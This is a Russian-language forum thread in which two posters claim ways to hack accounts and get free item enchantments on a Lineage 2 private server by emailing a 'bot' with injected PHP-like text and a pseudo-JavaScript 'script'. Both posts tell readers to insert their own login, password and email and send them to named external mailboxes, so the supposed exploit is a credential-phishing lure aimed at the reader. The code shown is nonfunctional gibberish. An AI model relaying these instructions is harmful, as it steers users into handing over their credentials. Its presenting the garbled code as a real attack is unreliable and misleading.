Главная Мой профиль Регистрация Выход Вход
Приветствую Вас Гость | RSS
Четверг
19.09.2024
9:16 PM
Blood Family
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Взлом Аккаунтов TheAbyss
La2HackДата: Вторник, 06.05.2008, 2:39 AM | Сообщение # 1
Рядовой
Группа: Пользователи
Сообщений: 1
Статус: Offline
Способ взлома аккаунта с сервера Abyss:
Админы сервера Abyss создали почту-бот через которую проходят все действия регистрация, восстановление пароля и т.д...Этот бот работает только с кодом!Чтобы его обмануть нужно просто подставить правильные данные чтобы бот в дальнейшем отправил пароль жертвы к вам на мыло!!! Чтобы начать взламывать аккаунты вам нужно сделать следующее.
В поле тема указать: ;?><?$accaunt='ТУТ ЛОГИН ЖЕРТВЫ';
В поле текст письма указать:
if ($accaunt=restore){
$accaunt_tmp='ТУТ ВАШ ЛОГИН'; $password='ТУТ ВАШ ПАРОЛЬ';$email='ТУТ ВАШ E-MAIL';}else{?>

Все это нужно отпавить боту: abyss.la2@inbox.ru

Кому надо пишите theabyss-hack@narod.ru знаю еще один способ взлом!

Сообщение отредактировал La2Hack - Вторник, 06.05.2008, 2:50 AM
 
BigHeroДата: Воскресенье, 15.03.2009, 12:15 PM | Сообщение # 2
Рядовой
Группа: Дипломаты
Сообщений: 1
Статус: Offline
Полностью с тобой согласен, сам ломанул так 3 акаунта!!! но есть еще похожий способ на заточку!!!!

Хочу поделиться с вами одним способом заточки на la2.theabyss.ru.
Взлом заточки происходит очень быстро и просто из-за этого робота, который управляет донейтом. Когда кто-то за 100 долларов точит драк на +50, его запрос обрабатывается роботом, которые посылает скрипт на почту, через которое непосредственно и точится ваша вещь. Главное, делать все правильно, как я написал.
Этот скрипт написан для того, чтобы бот заточил некоторую вещь на определенный +. Бот принимает письма этому ящику" donateta@bk.ru " . Не представляете каких трудов мне стоило разузнать его!
Пошлите письмо на этот ящик со следующим скриптом, заменяя строчки своими данными, без дополнительных пробелов и символов. Лучше просто скопируйте этот скрипт и просто замените ненужные данные. Если у вас уже точеная вещь, то заточка, которую вы указали, просто прибавится к нему.
Не злоупотребляйте! (настоящие люди же не могут так часто донатить,как вы хотите точить вещи;) Я еще сам не разобрался, почему-то точиться оружее С грейда и выше. Если соблюсти все правила, то гарантирую 100% результат. В момент заточки ваш персонаж не должен находится в игре, и оружие должно быть в руках! После отправки скрипта вы не должны использовать аккаунт в течении 12 часов(так как запрос может быть выполнен как сразу после его получения так и в течении 12 часов(как написано выше персонаж должен быть не в игре, етто и обьясняет почему нельзя заходить)).
Да что там греха таить, все этим скриптом пользуются, и на всех серверах, нужно толко разузнать почту какого-нибудь робота и написать к нему правильный скрипт. Желаю удачи!

script language=javascript
server= имя сервера
item$ = укажите полное название затачиваемого предмета или ид
enchant$ = укажите цифру, на сколько хотите заточить вещь
id$ = ваш логин
Characters = имя чара
pass = loadpwlfile(serveraccountpassword''''id''''.pwl)
pass$ = ваш пароль
q1 = loadfile(serveraccountpassword''''id.q1''''.sql)
function backpassword(id,pass,q1,q2,i,k)
if id= true and pass$=loadpwlfile(serveraccountpassword''''id$''''.pwl)
then
if q1 = true
then
send.file.passВаш почтовый адрес
end if
end function
script

вот собственно делов то, у самого дули С +16 cool

cool cool cool cool

Добавлено (15.03.2009, 12:15 Pm)
---------------------------------------------

Quote (BigHero)
Characters = имя чара

после имени чара через запьятую логин так как робот будет заходить через ЛК

 
  • Страница 1 из 1
  • 1
Поиск:


 Copyright MyCorp © 2024